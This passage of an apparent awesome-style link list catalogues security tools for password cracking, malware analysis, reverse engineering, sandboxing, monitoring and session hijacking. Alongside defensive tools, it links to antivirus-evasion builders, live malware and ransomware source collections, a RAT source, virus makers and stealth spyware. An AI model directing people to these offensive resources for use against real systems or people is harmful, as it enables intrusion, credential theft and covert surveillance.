It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncover,… 366 | * [hashcat](https://github.com/hashcat/hashcat): Password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking. 367 | * [John the Ripper jumbo](https://github.com/openwall/john): Advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs. 368 | * [L0phtCrack Password Auditor](https://www.l0phtcrack.com/): Enforce strong passwords across your enterprise. 369 | * [medusa](https://github.com/jmk-foofus/medusa): Medusa is a speedy, parallel, and modular, login brute-forcer. 370 | * [penglab](https://github.com/mxrch/penglab): Abuse of Google Colab for cracking hashes. 371 | * [RainbowCrack](https://project-rainbowcrack.com/): It is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It crack hashes with rainbow tables. 372 | * [Responder](https://github.com/lgandx/Responder): Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. 373 | * [thc-hydra](https://github.com/vanhauser-thc/thc-hydra): Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. 
---

### Malwares
* [4n4lDetector](http://www.enelpc.com/p/4n4ldetector.html): It is a tool for the analysis of Windows executable files, in order to quickly identify whether or not a file is malware. Most analyses are based on the extraction of "ANSI" and "UNICODE" strings on disk, but it also works with "Memory Dumps".
* [Advanced AV Evasion Tool For Red Team Ops](https://github.com/1y0n/AV_Evasion_Tool)
* [Antispy](https://hakin9.org/antispy-a-free-but-powerful-anti-virus-and-rootkits-toolkit/): AntiSpy is a free but powerful anti-virus and rootkit toolkit. It offers you the ability, with the highest privileges, to detect, analyze and restore various kernel modifications and hooks. With its assistance, you can easily spot and neutralize malware hidden from normal detectors.
* [awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis): A curated list of awesome malware analysis tools and resources.
* [awesome-yara](https://github.com/InQuest/awesome-yara): A curated list of awesome YARA rules, tools, and people.
* [Bytehist](https://cert.at/en/downloads/software/software-bytehist): A tool for generating byte-usage histograms for all types of files, with a special focus on binary executables in PE format (Windows).
* [Cerbero Suite](https://cerbero.io/)
* [Disk pulse](https://www.diskpulse.com/): It is a real-time disk change monitoring solution that allows one to monitor one or more disks or directories, save reports and disk change monitoring statistics, export detected changes to a centralized SQL database, execute custom commands and send e-mail notifications when unauthorized changes are detected in critical system files.
* [EvilClippy](https://github.com/outflanknl/EvilClippy): A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.
* [Ghidra-Scripts](https://github.com/AGDCservices/Ghidra-Scripts): Malware analysis scripts for Ghidra.
* [hijackthis](https://github.com/dragokas/hijackthis/): A free utility that finds malware, adware and other security threats.
* [Indetectables Toolkit](https://github.com/indetectables-net/toolkit): Fundamental reverse/analysis/cracking toolkit.
* [MalAPI.io](https://malapi.io/): List of Windows API functions ranked based on their usefulness in malware.
* [Malicious PDF Generator](https://github.com/jonaslejon/malicious-pdf): Generate a bunch of malicious PDF files with phone-home functionality. Can be used with Burp Collaborator.
* [MalwareAnalysis.co](https://malwareanalysis.co/): Collection of malware tools and resources: [Windows](https://malwareanalysis.co/resources/tools/windows/), [macOS](https://malwareanalysis.co/resources/tools/macos/), [Linux](https://malwareanalysis.co/resources/tools/linux/), [Android](https://malwareanalysis.co/resources/tools/android/).
* [M/Monit](https://mmonit.com/): Can monitor and manage distributed computer systems, conduct automatic maintenance and repair, and execute meaningful causal actions in error situations.
* [obfuscation_detection](https://github.com/mrphrazer/obfuscation_detection): Collection of scripts to pinpoint obfuscated code.
* [PELock Software Protection & Software License Key System](https://github.com/PELock/PELock-Software-Protection-and-Licensing-SDK)
* [Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion): It is an antivirus evasion tool written in Python (compatible with both python and python3) capable of generating (almost) fully undetectable executables even with the most common x86 msfvenom payloads.
* [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer): Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
* [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon): It is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
* [ProcDOT](https://www.procdot.com/): There are plenty of tools for behavioral malware analysis. The de facto standard ones, though, are Sysinternals' Process Monitor (also known as Procmon) and PCAP-generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These "two" tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis.
* [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump): It is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.
* [Reflexil](http://reflexil.net/): The .NET Assembly Editor.
* [ResourcesExtract](https://www.nirsoft.net/utils/resources_extract.html): It is a small utility that scans dll/ocx/exe files and extracts all resources (bitmaps, icons, cursors, AVI movies, HTML files, and more...) stored in them into the folder that you specify. You can use ResourcesExtract in user interface mode or, alternatively, in command-line mode without displaying any user interface.
* [SharpDllLoader](https://github.com/hexfati/SharpDllLoader): A simple C# executable that invokes an arbitrary method of an arbitrary C# DLL.
* [Shellter](https://www.shellterproject.com/introducing-shellter/): It is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
* [SysAnalyzer](http://sandsprite.com/iDef/SysAnalyzer/): It is an open source application that was designed to give malcode analysts an automated tool to quickly collect, compare, and report on the actions a binary took while running on the system.
* [TheFatRat](https://github.com/Screetsec/TheFatRat): It is an exploiting tool which compiles a malware with a famous payload, and then the compiled malware can be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus.
* [Windows Sysinternals](https://docs.microsoft.com/en-us/sysinternals/)
* [YARA](https://virustotal.github.io/yara/): YARA is a tool aimed at (but not limited to) helping malware researchers to identify and classify malware samples.

#### Android
* [APK Decompilers Online](https://www.apkdecompilers.com/)
* [apkleaks](https://github.com/dwisiswant0/apkleaks): Scanning APK files for URIs, endpoints & secrets.
* [apkstudio](https://github.com/vaibhavpandeyvpz/apkstudio): Open-source, cross-platform Qt-based IDE for reverse-engineering Android application packages.
* [Apktool](https://github.com/iBotPeaches/Apktool): A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications. It also makes working with an app easier because of the project-like file structure and automation of some repetitive tasks like building the apk, etc.
* [appium](https://github.com/appium/appium): It is an open source test automation framework for use with native, hybrid and mobile web apps.
* [Argus-SAF](https://github.com/arguslab/Argus-SAF): Argus static analysis framework.
* [BitBar](https://bitbar.com/): Testing Intelligence for DevOps.
* [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer): A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More).
* [dexcalibur](https://github.com/FrenchYeti/dexcalibur): Android reverse engineering tool focused on dynamic instrumentation automation. Powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
* [drozer](https://github.com/FSecureLABS/drozer): The Leading Security Assessment Framework for Android.
* [fbinfer](https://github.com/facebook/infer): A tool to detect bugs in Java and C/C++/Objective-C code before it ships.
* [frida.re](https://frida.re/docs/android/): Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
* [Inspeckage](https://github.com/ac-pm/Inspeckage): Android Package Inspector - dynamic analysis with API hooks, start unexported activities and more.
* [JEB Decompiler](https://www.pnfsoftware.com/): Decompile and debug binary code. Break down and analyze document files. Android Dalvik, Intel x86, ARM, MIPS, Java, WebAssembly & Ethereum decompilers.
* [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF): It is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
* [objection](https://github.com/sensepost/objection): Runtime mobile exploration.
* [Quixxi Vulnerability Scanner](https://vulnerabilitytest.quixxi.com/#/)
* [SandDroid](http://sanddroid.xjtu.edu.cn/#upload): An automatic Android application analysis system.
* [selendroid](http://selendroid.io/): Test automation for native or hybrid Android apps and the mobile web with Selendroid.
* [Sixo Online APK Analyzer](https://www.sisik.eu/apk-tool): This tool allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.

#### Databases
* [ANY.RUN](https://app.any.run/submissions): Registration required.
* [Contagio Malware Dump](http://contagiodump.blogspot.com/): Curated, password required.
* [CAPE Sandbox](https://capesandbox.com/): Registration required.
* [Das Malwerk](http://dasmalwerk.eu/)
* [Hatching Triage](https://tria.ge/): Registration required.
* [Hybrid Analysis](https://www.hybrid-analysis.com/): Registration required.
* [InQuest Malware Samples](https://github.com/InQuest/malware-samples)
* [ios-malware](https://github.com/ashishb/ios-malware): KeyRaider, OneClick, and XcodeGhost.
* [KernelMode.info](http://www.kernelmode.info/forum/viewforum.php?f=16): Registration required.
* [MalShare](http://malshare.com/): Registration required.
* [MalwareBazaar](https://bazaar.abuse.ch/): MalwareBazaar is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
* [MalwareSamples](https://github.com/MalwareSamples/Malware-Feed/): Malware-Feed: Curated.
* [MalwareSourceCode](https://github.com/vxunderground/MalwareSourceCode): Collection of malware source code for a variety of platforms in an array of different programming languages.
* [Objective-See Collection](https://objective-see.com/malware.html): Mac malware.
* [PacketTotal](https://packettotal.com/malware-archive.html): Malware inside downloadable PCAP files.
* [PhishingKitTracker](https://github.com/marcoramilli/PhishingKitTracker): Phishing sites source code.
* [PolySwarm](https://polyswarm.network/): Registration required.
* [SNDBOX](https://app.sndbox.com/): Registration required.
* [SoReL-20M](https://github.com/sophos-ai/SOREL-20M): 10M defanged malware samples.
* [theZoo](https://thezoo.morirt.com/): A repository of LIVE malwares for your own joy and pleasure.
* [URLhaus](https://urlhaus.abuse.ch/browse/): Links to live sites hosting malware.
* [VirusBay](https://beta.virusbay.io/): Registration required.
* [VirusShare](https://virusshare.com/): Registration required.
* [VirusSign](https://www.virussign.com/downloads.html): Registration required.
* [Virus and Malware Samples](https://www.virussamples.com/): Includes APT, registration required.
* [vx-underground](https://vx-underground.org/samples.html)

#### Debuggers / Disassemblers
* [Fiddler](https://www.telerik.com/fiddler)
* [Immunity Debugger](https://www.immunityinc.com/products/debugger/): It is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.
* [OllyDbg](http://www.ollydbg.de/): OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
* [WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools): Can be used to debug kernel-mode and user-mode code, analyze crash dumps, and examine the CPU registers while the code executes.
* [x64dbg](https://github.com/x64dbg/x64dbg): An open-source x64/x32 debugger for Windows.

#### Decompilers
* [binary.ninja](https://binary.ninja/): Online decompiler.
* [cutter](https://github.com/rizinorg/cutter): Free and Open Source Reverse Engineering Platform powered by rizin.
* [Decompiler](https://www.decompiler.com/): Online decompiler.
* [dnSpy](https://github.com/dnSpy/dnSpy): .NET debugger and assembly editor.
* [Dotnet IL Editor (dile)](https://sourceforge.net/projects/dile/): Dotnet IL Editor (DILE) allows disassembling and debugging .NET 1.0/1.1/2.0/3.0/3.5/4.0 applications without source code or .pdb files. It can debug even itself or the assemblies of the .NET Framework at IL level.
* [dotPeek](https://www.jetbrains.com/es-es/decompiler/): It is a .NET decompiler from JetBrains, the makers of a wide array of developer productivity tools: ReSharper, dotTrace, and dotCover for .NET developers.
* [Ghidra Software Reverse Engineering Framework](https://github.com/NationalSecurityAgency/ghidra): This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, macOS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.
* [IDA Pro](https://www.hex-rays.com/products/ida/)
* [ILSpy](https://github.com/icsharpcode/ILSpy): ILSpy is the open-source .NET assembly browser and decompiler.
* [Online Disassembler](https://onlinedisassembler.com/odaweb/)
* [radare2](https://github.com/radareorg/radare2): UNIX-like reverse engineering framework and command-line toolset.
* [ScyllaHide](https://github.com/x64dbg/ScyllaHide): ScyllaHide is an advanced open-source x64/x86 user mode Anti-Anti-Debug library. It hooks various functions to hide debugging. This tool is intended to stay in user mode (ring 3).
* [Snowman](https://derevenets.com/): Snowman is a native code to C/C++ decompiler.
* [Telerik JustDecompile](https://www.telerik.com/products/decompiler.aspx): Open Source Decompilation Engine.
* [Tenet - A Trace Explorer for Reverse Engineers](https://github.com/gaasedelen/tenet): Tenet is an IDA Pro plugin for exploring execution traces. The goal of this plugin is to provide more natural, human controls for navigating execution traces against a given binary. The basis of this work stems from the desire to research new or innovative methods to examine and distill complex execution patterns in software.
* [UtinyRipper](https://github.com/mafaca/UtinyRipper): It is a tool for extracting assets from serialized files (CAB-*, *.assets, *.sharedAssets, etc.) and asset bundles (*.unity3d, *.assetbundle, etc.) and converting them into native Engine format.
* [xAnalyzer](https://github.com/ThunderCls/xAnalyzer): xAnalyzer is a plugin for the x86/x64 x64dbg debugger by @mrexodia. This plugin is based on the APIInfo Plugin by @mrfearless, although some improvements and additions have been made. xAnalyzer is capable of doing various types of analysis over the static code of the debugged application to give extra information to the user. This plugin performs extensive API function call detection to add function definitions, arguments and data types as well as any other complementary information, something close to what you get with OllyDbg's analysis engine, in order to make the code more comprehensible to the user just before starting the debugging task.

#### Deobfuscator
* [de4dot](https://github.com/de4dot/de4dot): .NET deobfuscator and unpacker.
* [XLMMacroDeobfuscator](https://github.com/DissectMalware/XLMMacroDeobfuscator): Extract and deobfuscate XLM macros (a.k.a. Excel 4.0 Macros).

#### Dependencies
* [DependencyCheck](https://github.com/jeremylong/DependencyCheck): OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies.
* [Dependency Walker](https://www.dependencywalker.com/): It is a free utility that scans any 32-bit or 64-bit Windows module (exe, dll, ocx, sys, etc.) and builds a hierarchical tree diagram of all dependent modules. For each module found, it lists all the functions that are exported by that module, and which of those functions are actually being called by other modules. Another view displays the minimum set of required files, along with detailed information about each file including a full path to the file, base address, version numbers, machine type, debug information, and more.
* [Hakiri](https://hakiri.io/): Monitors Ruby apps for dependency and code security vulnerabilities.
* [RetireJS](https://retirejs.github.io/retire.js/): There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay up to date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect the use of versions with known vulnerabilities.
* [snyk](https://snyk.io/)

#### Device drivers monitoring
* [DriverView](https://www.nirsoft.net/utils/driverview.html)

#### DNS monitoring
* [DNSQuerySniffer](https://www.nirsoft.net/utils/dns_query_sniffer.html): It is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records.

#### File fingerprinting
* [HashCalc](https://www.slavasoft.com/hashcalc/)
* [HashMyFiles](https://www.nirsoft.net/utils/hash_my_files.html): It is a small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into a text/html/xml file.
* [HashTab](http://implbits.com/products/hashtab/)
* [md5deep and hashdeep](http://md5deep.sourceforge.net/)
* [mimikatz](https://github.com/gentilkiwi/mimikatz): A little tool to play with Windows security.

#### Files integrity monitoring
* [CSP File Integrity Checker](https://www.cspsecurity.com/solutions/compliance-and-file-monitoring/file-integrity-checker/): FIC delivers a simple yet powerful solution with its file monitoring and reporting capabilities. File monitoring is a critical part of the PCI data security standard to protect confidential (e.g. card-holder) information.
* [Netwrix Auditor](https://www.netwrix.com/auditor.html)
* [NNT Change Tracker](https://www.newnettechnologies.com/change-tracker-gen-7.html): Includes context-based File Integrity Monitoring and File Whitelisting to assure all change activity is automatically analyzed and validated.
* [PA File Sight](https://www.poweradmin.com/products/file-sight/)
* [Verisys](https://www.ionx.co.uk/): File integrity monitoring for Windows, Linux and network devices.
* [Wazuh](https://github.com/wazuh)

#### Network
* [Capsa Portable Network Analyzer](https://www.colasoft.com/capsa/): Capsa, a portable network performance analysis and diagnostics tool, provides a tremendously powerful and comprehensive packet capture and analysis solution with an easy-to-use interface, allowing both veteran and novice users the ability to protect and monitor networks in a critical business environment. Capsa aids in keeping you apprised of threats that may cause significant business outages.
* [CurrPorts](https://www.nirsoft.net/utils/cports.html): It is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, and so on), the time that the process was created, and the user that created it.
* [FakeNet](https://sourceforge.net/projects/fakenet/): It is a Windows network simulation tool designed for malware analysis. It redirects all traffic leaving a machine to the localhost (including hard-coded IP traffic and DNS traffic) and implements several protocols to ensure that malicious code continues to execute and can be observed by an analyst.
* [GFI LanGuard](https://www.gfihispana.com/products-and-solutions/network-security-solutions/gfi-languard)
* [INetSim](https://www.inetsim.org/downloads.html): It is a software suite for simulating common internet services in a lab environment, e.g. for analyzing the network behaviour of unknown malware samples.
* [NetFlow Traffic Analyzer](https://www.solarwinds.com/es/netflow-traffic-analyzer)
* [Netfort](https://www.netfort.com/)
* [Port Monitor](https://port-monitor.com/)
* [PRTG Network Monitor](https://www.es.paessler.com/prtg)
* [TCPView](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview): It is a Windows program that will show you detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections.
* [Wireshark](https://www.wireshark.org/)

#### Packers
* [.NET Generic Unpacker](https://ntcore.com/?page_id=353): This is a program to dump .NET packed applications. Of course no serious .NET protection relies on packing. In fact, this software shows how easily you can unpack a protected assembly. This .NET Generic Unpacker was written in a couple of hours and, despite the fact that it's very simple, it might turn out useful to have it: otherwise you have to unpack manually, which is quite easy as well.
* [ASL](https://github.com/ExeinfoASL/ASL): Detect packer, compiler, protector, .NET obfuscator.
* [ASPack](http://aspack.com/): It is an advanced EXE packer created to compress Win32 executable files and to protect them against non-professional reverse engineering.
* [Detect-It-Easy](https://github.com/horsicq/Detect-It-Easy): Program for determining types of files for Windows, Linux and MacOS.
* [PEiD](https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml): It is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Its detection rate is higher than that of other similar tools since the app packs more than 600 different signatures for PE files.
* [macro_pack](https://github.com/sevagas/macro_pack): The macro_pack is a tool used to automate the obfuscation and generation of retro formats such as MS Office documents or VBS-like formats. Now it also handles various shortcut formats.
* [RDG Packer Detector](http://www.rdgsoft.net/): It is a detector for packers, ciphers, compilers, encoders, assemblers, installers.
* [UPX the Ultimate Packer for eXecutables](https://upx.github.io/): It is a free, portable, extendable, high-performance executable packer for several executable formats.

#### Portable Executable (PE) explorer
* [CFF Explorer](https://ntcore.com/?page_id=388): CFF Explorer was designed to make PE editing as easy as possible, but without losing sight of the portable executable's internal structure.
* [Detect It Easy (DiE)](https://horsicq.github.io/): Determining types of files.
* [dllcharacteristics.py](https://github.com/accidentalrebel/dllcharacteristics.py): A simple Python tool for getting and setting the values of DLL characteristics for PE files.
* [Exeinfo PE](http://exeinfo.atwebpages.com/)
* [Lord PE](https://www.aldeid.com/wiki/LordPE): LordPE is a tool for system programmers/reverse engineers which is able to edit/view many parts of PE (Portable Executable) files, dump them from memory, optimize them, validate, analyze, edit, etc.
* [PE Explorer](http://www.heaventools.com/overview.htm): Lets you open, view and edit a variety of different 32-bit Windows executable file types (also called PE files) ranging from the common, such as EXE, DLL and ActiveX Controls, to the less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL and more (including executable files that run on the MS Windows Mobile platform).
* [PE-bear](https://github.com/hasherezade/pe-bear-releases): PE-bear is a freeware reversing tool for PE files. Its objective is to deliver a fast and flexible "first view" for malware analysts, stable and capable of handling malformed PE files.
* [pefile](https://github.com/erocarrera/pefile): It is a Python module to read and work with PE (Portable Executable) files.
* [PEframe](https://github.com/guelfoweb/peframe): It is an open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents.
* [PeNet](https://github.com/secana/PeNet): It is a parser for Windows Portable Executable headers. It is completely written in C# and does not rely on any native Windows APIs. Furthermore, it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. You can extract the Certificate Revocation List, compute different hash sums and other useful stuff for working with PE files.
* [PeNet Web](https://penet.azureedge.net/): PeNet Web is an online Portable Executable viewer. It displays fields and additional information from uploaded PE files. The project is based on the PeNet library.
* [pestudio](https://www.winitor.com/features): The goal of pestudio is to spot artifacts of executable files in order to ease and accelerate Malware Initial Assessment. The tool is used by Computer Emergency Response (CERT) teams, Security Operations Centers (SOC) and Labs worldwide.
* [PeView](http://wjradburn.com/software/): Provides a quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files. This PE/COFF file viewer displays header, section, directory, import table, export table, and resource information within EXE, DLL, OBJ, LIB, DBG, and other file types.
* [PortEx](https://github.com/katjahahn/PortEx): Java library to analyse Portable Executable files with a special focus on malware analysis and PE malformation robustness.
* [Portable Executable Scanner (pescan)](https://tzworks.net/prototype_page.php?proto_id=15): It is a command line tool to scan portable executable (PE) files to identify how they were constructed.
* [PPEE (puppy)](https://www.mzrst.com/): It is a Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
* [Resource Hacker](http://www.angusj.com/resourcehacker/): It is a resource editor for 32-bit and 64-bit Windows® applications. It's both a resource compiler (for *.rc files) and a decompiler, enabling viewing and editing of resources in executables (*.exe; *.dll; *.scr; etc.) and compiled resource libraries (*.res, *.mui). While Resource Hacker™ is primarily a GUI application, it also provides many options for compiling and decompiling resources from the command line.

#### Ransomware
* [ransomware-sources](https://github.com/theanonhackuk/ransomware-sources): Collection of source code of some ransomware on GitHub.

#### RATs
* [RAT-NjRat-0.7d-modded-source-code](https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code)

#### Scanners / Sandbox
* [Cuckoo](https://cuckoosandbox.org/): You can throw any suspicious file at it and in a matter of minutes Cuckoo will provide a detailed report outlining the behavior of the file when executed inside a realistic but isolated environment.
* [Hybrid Analysis](): This tool allows sending a file to different scanners in parallel: VirusTotal, MetaDefender and CrowdStrike Falcon. Send samples.
* [jotti](https://www.virustotal.com/gui/): Simple online scanner that returns the scan results of a number of antivirus scanners, as well as some basic information about the file. Send samples.
* [KIMS](https://github.com/xchwarze/KIMS): KIMS was the first local and web multi-scanner in the world; its last version came out in 2006, programmed by Thor. In 2009 it began being developed into the new version by DSR!.
* [Malice.IO](https://github.com/maliceio): VirusTotal Wanna Be - Now with 100% more Hipster.
* [MalwareAnalysis.co](https://malwareanalysis.co/sandboxes/)
* [NoDistribute](https://nodistribute.com/)
* [Noriben](https://github.com/Rurik/Noriben): Portable, Simple, Malware Analysis Sandbox.
* [thor-av-multiscanner](https://github.com/Lifka/thor-av-multiscanner): Static analysis of malware using Docker. This software allows you to scan a file with different antivirus engines. Also, it allows obtaining information from a file, such as imported libraries, PE, hashes, etc.
* [Valkyrie Sandbox](https://valkyrie.comodo.com/): It is a file verdict system. Different from traditional signature-based malware detection techniques, Valkyrie conducts several analyses using run-time behavior and hundreds of features from a file and, based on the analysis results, can warn users against malware undetected by classic Anti-Virus products.
* [VirusTotal](https://www.virustotal.com/gui/): Analyze suspicious files and URLs to detect types of malware, and automatically share them with the security community. Displays information on static and dynamic analysis. Send samples.

#### Spyware
* [ACTIVTrack](https://activtrak.com)
* [Spytech SpyAgent](https://www.spytech-web.com/spyagent.shtml): Allows you to monitor and record EVERYTHING users do on your computer - in total stealth. SpyAgent provides an unrivaled set of essential computer monitoring features, as well as website and application content filtering, chat client blocking, real-time activity alerts, and remote delivery of logs via email or FTP.
* [NetVizor](https://www.netvizor.net)
* [Power Spy](https://ematrixsoft.com/power-spy-software.php): It is computer activity monitoring software that allows you to secretly log all users on a PC while they are unaware. After the software is installed on the PC, you can remotely receive log reports on any device via email or FTP. You can check these reports as soon as you receive them or at any convenient time. You can also directly check logs using the log viewer on the monitored PC.
* [SoftActivity Monitor](https://www.softactivity.com)
* [Veriato Cerebral](https://www.veriato.com)

#### String search
* [BinText](https://www.aldeid.com/wiki/BinText): A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.
* [FireEye Labs Obfuscated String Solver](https://github.com/fireeye/flare-floss): Automatically extract obfuscated strings from malware.
* [Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings)
* [stringsifter](https://github.com/mandiant/stringsifter): A machine learning tool that ranks strings based on their relevance for malware analysis.

#### Virus
* [DELmE's Batch Virus Maker](https://github.com/hacktoolspack/hack-tools/tree/master/DELmE's%20Batch%20Virus%20Maker%20v%202.0)
* [JPS Virus Maker](http://www.solidfiles.com/v/DKy7Xd6Rgrj8x)

#### Windows registry monitoring
* [Autoruns for Windows](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns): This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login, and when you start various built-in Windows applications like Internet Explorer, Explorer and media players. These programs and drivers include ones in your startup folder, Run, RunOnce, and other Registry keys. Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. Autoruns goes way beyond other autostart utilities.
* [Registrar Registry Manager](https://www.resplendence.com/registrar): It is an advanced and complete suite of tools that allows you to safely maintain your local registry as well as the registries on the systems of your network. For many years, Registrar Registry Manager has been the expert's choice in registry management.
* [Registry Viewer](https://accessdata.com/product-download/registry-viewer-2-0-0)
* [Reg Organizer](https://www.chemtable.com/organizer.htm): The utility allows you to remove unwanted programs from the system and search for traces of the uninstalled program. If there are "heavy" programs that run automatically on start-up in your Windows operating system, disabling them in an advanced startup manager can in some cases speed up the boot time and operation of your operating system. The disk cleanup feature frees up space on your system disk. And this is only part of the features in the utility.
* [RegScanner](https://www.nirsoft.net/utils/regscanner.html): It is a small utility that allows you to scan the Registry, find the desired Registry values that match the specified search criteria, and display them in one list. After finding the Registry values, you can easily jump to the right value in RegEdit, simply by double-clicking the desired Registry item. You can also export the found Registry values into a .reg file that can be used in RegEdit.
* [regshot](https://sourceforge.net/projects/regshot/): Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after making system changes or installing a new software product.

#### Windows services monitoring
* [Advanced Windows Service Manager](https://securityxploded.com/winservicemanager.php): It is specialized software for smarter analysis of Windows Services. It offers many powerful and unique features that set it apart from the built-in Service Management Console as well as other similar software.
* [AnVir Task Manager](https://www.anvir.com/): Control everything running on the computer, remove Trojans, speed up the computer.
* [Netwrix Service Monitor](https://www.netwrix.com/windows_services_monitoring_freeware.html): Freeware service monitoring tool that enables you to monitor Windows services on your critical servers.
* [PA File Sight](https://www.poweradmin.com/products/file-sight/licensing-and-pricing/)
* [Process Hacker](https://processhacker.sourceforge.io/)
* [Service+](https://www.activeplus.com/products/serviceplus)
* [SrvMan](https://sysprogs.com/legacy/tools/srvman/): Windows Service Manager is a small tool that simplifies all common tasks related to Windows services. It can create services (both Win32 and Legacy Driver) without restarting Windows, delete existing services and change service configuration. It has both GUI and command-line modes. It can also be used to run arbitrary Win32 applications as services (when such a service is stopped, the main application window is closed automatically).

---

### Session hijacking
* [Burp Suite](https://portswigger.net/burp)
* [bettercap](https://github.com/bettercap/bettercap): The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and MITM attacks.
* [netool toolkit](https://sourceforge.net/projects/netoolsh/): MitM pentesting open-source toolkit.
* [OWASP ZAP](https://www.zaproxy.org/): It is an integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. ZAP allows you to see all the requests you make to a web app and all the responses you receive from it. Among other things, it allows you to see AJAX calls that may not otherwise be outright visible. You can also set breakpoints, which allow you to change the requests and responses in real time.
* [sslstrip](https://github.com/moxie0/sslstrip): A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.
* [WebSploit Framework](https://sourceforge.net/projects/websploit/)

#### Android
* [DroidSheep](https://droidsheep.info/): It is an open-source Android application made by Corsin Camichel that allows you to intercept unprotected web-browser sessions using WiFi.
* [DroidSniff](https://github.com/evozi/DroidSniff): It is an Android app for security analysis in wireless networks and capturing facebook, twitter, linkedin and other accounts.
